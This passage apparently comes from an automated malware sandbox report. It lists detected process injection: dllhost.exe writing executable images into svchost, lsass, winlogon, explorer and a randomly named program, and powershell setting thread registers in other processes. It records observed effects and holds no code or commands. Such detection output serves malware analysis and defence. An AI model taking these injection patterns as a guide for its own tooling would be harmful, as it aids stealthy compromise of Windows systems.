Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C06C9A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1370000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2CA6EDC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A6F2BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1EC29790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25235280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 3C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: F20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21EC07B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 3B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C06C9A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 2527DEB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2CA6EDC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A6F2BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 286D7CE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1EC29790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 257A8150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25235280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1908C4A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1D547800000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21EC07B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 286D7CE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 257A8150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1908C4D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1D547800000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 19192FE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 19193100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 29BC05B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1FAFFD50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2271B950000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 22735E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1DAF18C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1DAF1910000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 2127EAE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 176E8750000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28CD8B30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28CF3050000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 2612B210000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 2612B210000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: PID: 4056 base: 8B20000 value: 4D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 6720Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 4332
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 1796
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: 6720 1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: D10000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140004000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140006000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140007000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: C33C0BB010
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 1CA7D1B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 17D2DD20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22F4B8F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 1CA7D1B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 17D2DD20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22F4B920000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 262F1CA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 262F1CD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23942AE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1EF056A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2287AD40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B94DA60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25202540000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A9EBF90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19FF1600000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23942AE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1EF056A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2287AD40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B94DA60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25202540000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A9EBF90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19FF1630000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A76A170000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A76A1A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14D26990000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2175D5C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B0AB960000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2129B2A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14D26990000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2175D5C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B0AB960000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2129B2D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26384180000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 263841B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25178730000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1495FCF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22125D90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 297A5D80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2D0F41C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C325340000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AEFCF40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 270F3530000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D326280000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 16131E60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AE137C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C93A3B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E2E4190000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1450000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AB68FA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 265951C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C263510000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E120000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18198580000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1EF3C5C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 17ACF3D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19E8E330000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5A2950000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25178730000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD340C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1495FCF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B653790000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22125D90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B19A0E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 297A5D80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24730B30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15F35DA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 200792F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18CE9170000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D326280000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D959C80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 16131E60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18F1AC00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AE137C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FF01350000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C93A3B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 221D2530000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E2E4190000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D400530000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1450000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 8B20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AB68FA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 27844DD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 265951C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 258B00D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C263510000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FA9A260000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E120000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 1BFB71A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18198580000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 26982020000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1EF3C5C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 185706E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 17ACF3D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1496A4A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19E8E330000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 190043F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD340C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 16215D10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B653790000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 159AD5E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B19A0E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 221570C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24730B30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B8E5260000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15F35DA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 189090B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 200792F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18CE9170000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD9B7A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D959C80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 297E6E00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18F1AC00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 29BB2810000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FF01350000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: A20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 27844DD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 8B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FA9A260000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 1BFB71A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 690000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: DE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1496A4A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 190043F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 16215D10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 5B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 159AD5E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 221570C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B8E5260000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 189090B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD9B7A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: A70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 297E6E00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 640000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 29BB2810000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: A20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 900000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: CA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 8B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 740000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 690000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: DE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 5B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1200000
